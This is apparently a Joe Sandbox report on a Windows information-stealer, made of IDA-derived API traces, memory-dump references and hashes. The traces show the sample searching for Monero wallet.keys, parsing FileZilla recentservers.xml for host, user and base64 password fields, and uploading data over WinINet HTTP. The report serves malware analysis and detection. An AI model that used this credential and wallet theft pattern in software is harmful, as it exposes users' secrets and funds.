                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001515B8,00150D96), ref: 0013F71E
                  • StrCmpCA.SHLWAPI(?,001515BC), ref: 0013F76F
                  • StrCmpCA.SHLWAPI(?,001515C0), ref: 0013F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0013FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: c51412134c160f36cda841a37ecf59774b01d78370b882f65ec67c2f568080c3
                  • Instruction ID: 6cfcc4915364939178910a48b6a0882ab03625c925dc44f6f87250290f38b294
                  • Opcode Fuzzy Hash: c51412134c160f36cda841a37ecf59774b01d78370b882f65ec67c2f568080c3
                  • Instruction Fuzzy Hash: F1119D7188410DABEB14FBB0DC559DD7378EF21301F924669A51A570A2EF30274AC752
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G\L
                  • API String ID: 0-4220368099
                  • Opcode ID: 4126c48baf1d332ef91d311fc9267b8743320364c3f50e4576d1420ff71ae02c
                  • Instruction ID: ebd462083a6bae02d75d43b79847451b5ddb4b017a296f6fb7fe5f246c1b6349
                  • Opcode Fuzzy Hash: 4126c48baf1d332ef91d311fc9267b8743320364c3f50e4576d1420ff71ae02c
                  • Instruction Fuzzy Hash: 72510BF3A482009FE3486E28DC95779F7D5EF94320F1B453DDACA87780EA3A58158752
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Oo/
                  • API String ID: 0-3685457274
                  • Opcode ID: 657c488bd6db85cb6d4f1ea72608ac2faa3f6195abd9a13e899c68a9d97153b6
                  • Instruction ID: 9225ebbfce6614ca5c143ed3747eeedae6aa25a68905b048fcf6e4d65e663816
                  • Opcode Fuzzy Hash: 657c488bd6db85cb6d4f1ea72608ac2faa3f6195abd9a13e899c68a9d97153b6
                  • Instruction Fuzzy Hash: 484129F3A082045FE708AA28EC9176BB7D9EB94320F19853DEA85C7344ED3859054796
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ad9603f199ea959aab18ab773eddbee3ff8641cdddb3035e09f74dcdf47f02c
                  • Instruction ID: 243786856aebeb454b58d92e997ba59c98af2d8d6f1b2e4c79e367ab40962c68
                  • Opcode Fuzzy Hash: 3ad9603f199ea959aab18ab773eddbee3ff8641cdddb3035e09f74dcdf47f02c
                  • Instruction Fuzzy Hash: 6351D3F3A086109FE7186E29DC8577ABBE6EFD4720F07453DEAC887780E93458418696
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c0d6e74df1e7dc1d31371e765ac1f9601b2751a8c37e10761087c30fd1fb59
                  • Instruction ID: c45c774681d1529d8e951da01d0a883daa908f4620287aaf47da92b268a0776f
                  • Opcode Fuzzy Hash: 48c0d6e74df1e7dc1d31371e765ac1f9601b2751a8c37e10761087c30fd1fb59
                  • Instruction Fuzzy Hash: 9951D5F3F085105BF3089E29DC9177AB7D6EBD4320F1A863DE789933C0E93958058696
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 39ae196360d6969296514edbff6fe186bc12f14404f0737a58c9652925346567
                  • Instruction ID: 96096c97bdcf0d77992da3472669ec1db807c5036e926a828348d6fc7706cc0f
                  • Opcode Fuzzy Hash: 39ae196360d6969296514edbff6fe186bc12f14404f0737a58c9652925346567
                  • Instruction Fuzzy Hash: 27316BB291C3009FE345AE29DC826BAFBE5EF98720F12492DE6C5D3610E67158418A97
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a47df607ea7f30447caf2267cc655cf971989726512bf069add36bccd12e090
                  • Instruction ID: bf4c586a39a37e90d176b95cc493bdb4fa66becf7944375d988bb2300d991420
                  • Opcode Fuzzy Hash: 8a47df607ea7f30447caf2267cc655cf971989726512bf069add36bccd12e090
                  • Instruction Fuzzy Hash: 52210873D0C030DBD3199919DC1167AFBA5EF95310F22892DD9D667384E9751C1186E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 009d44e2599915bfefa12373af0db249c59c9844bcd5f8e56c4220724dbdd75f
                  • Instruction ID: 4ad7a5191b9cdc6df6db7c80e982cd1ee20b2128748fd00bb784b7f8c4843e90
                  • Opcode Fuzzy Hash: 009d44e2599915bfefa12373af0db249c59c9844bcd5f8e56c4220724dbdd75f
                  • Instruction Fuzzy Hash: 0D2153B240C7189FD715BE6CDC956BAF7E4EF18750F06092DDAD583300EA70A9148B9B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00150DBA,00150DB7,00150DB6,00150DB3), ref: 00140362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00140369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00140385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 001403CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 001403DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00140419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00140463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 00140532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00140562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00140571
                  • lstrcat.KERNEL32(?,url: ), ref: 00140580
                  • lstrcat.KERNEL32(?,00000000), ref: 00140593
                  • lstrcat.KERNEL32(?,00151678), ref: 001405A2
                  • lstrcat.KERNEL32(?,00000000), ref: 001405B5
                  • lstrcat.KERNEL32(?,0015167C), ref: 001405C4
                  • lstrcat.KERNEL32(?,login: ), ref: 001405D3
                  • lstrcat.KERNEL32(?,00000000), ref: 001405E6
                  • lstrcat.KERNEL32(?,00151688), ref: 001405F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00140604
                  • lstrcat.KERNEL32(?,00000000), ref: 00140617
                  • lstrcat.KERNEL32(?,00151698), ref: 00140626
                  • lstrcat.KERNEL32(?,0015169C), ref: 00140635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00150DB2), ref: 0014068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: ad1a2ae9ba83907ed9d635d84f66c089f6ea2c8933d781a35a77e90a0aeeee70
                  • Instruction ID: c300a609b0c6a26d2d21c5f71bdea92ccb1b66163fc4a412e54dcfd92014311b
                  • Opcode Fuzzy Hash: ad1a2ae9ba83907ed9d635d84f66c089f6ea2c8933d781a35a77e90a0aeeee70
                  • Instruction Fuzzy Hash: F9D17371940108ABDB05EBF0DD96EEE773CEF68301F514418F516A70A1DF74AA4ACB62
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001359F8
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00135A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00135B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0102E4E0,00000000,?,01029EE8,00000000,?,00151A1C), ref: 00135E71
                  • lstrlen.KERNEL32(00000000), ref: 00135E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00135E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00135E9A
                  • lstrlen.KERNEL32(00000000), ref: 00135EAF
                  • lstrlen.KERNEL32(00000000), ref: 00135ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00135EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00135F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00135F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00135F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00135FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00135FBD
                  • HttpOpenRequestA.WININET(00000000,0102E530,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00135BF8
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • InternetCloseHandle.WININET(00000000), ref: 00135FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
• Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f676adba3f6a66a961fda43b87a48df7921222efb60c649885012b0b025b4fa7
